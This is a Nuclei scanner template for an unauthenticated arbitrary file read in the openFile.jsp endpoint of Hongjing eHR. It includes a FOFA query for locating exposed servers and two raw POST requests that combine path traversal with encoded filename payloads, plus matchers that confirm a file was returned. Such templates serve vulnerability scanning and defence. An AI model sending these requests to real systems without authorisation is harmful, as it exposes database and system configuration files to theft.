id: hjsoft-openfile-fileread
info:
  name: 宏景人力资源管理系统 openFile.jsp - fileread
  author: leadlife
  severity: high
  description: 宏景 eHR openFile.jsp 接口处存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等
  reference:
    - https://github.com/k3ppf0r/2024-PocLib/blob/f64375e23082dff16b86ab07b2f452bd7156a31d/2024-6-07/%E5%AE%8F%E6%99%AFeHR%20openFile.jsp%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/TVE-2024-106061131.yaml#L26
  metadata:
    verified: true
    fofa-query: 'body="<div class=\"hj-hy-all-one-logo\""||title="人力资源信息管理系统"||body="/general/sys/hjaxmanage.js"'
  tags: hjsoft,fileread

http:
  - raw:
      - |
        POST /templates/attestation/../../general/muster/hmuster/openFile.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0
        Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
        Content-Type: application/x-www-form-urlencoded

        filename=8uHo1M8Ok6bZ468mKmzw70ounZHwKUWnpVOrvOAV6WoPAATTP3HJDPAATTP
      
      - |
        POST /templates/attestation/../../general/muster/hmuster/openFile.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0
        Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
        Content-Type: application/x-www-form-urlencoded
        
        filename=8uHo1M8Ok6bZ468mKmzw7xWCzPAATTP2HJBPAATTP8j8sjHiBmsb9ThhDsrcV8PAATTP2HJBPAATTPG67rw8nTSnppHAL6UwTPAATTP2HJBPAATTPZPAATTP2HJBPAATTP9x5w4PAATTP3HJDPAATTP
    
    stop-at-first-match: true
    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body_1, "<?xml")
        condition: and
      
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body_2,"response.reset")
        condition: and
      
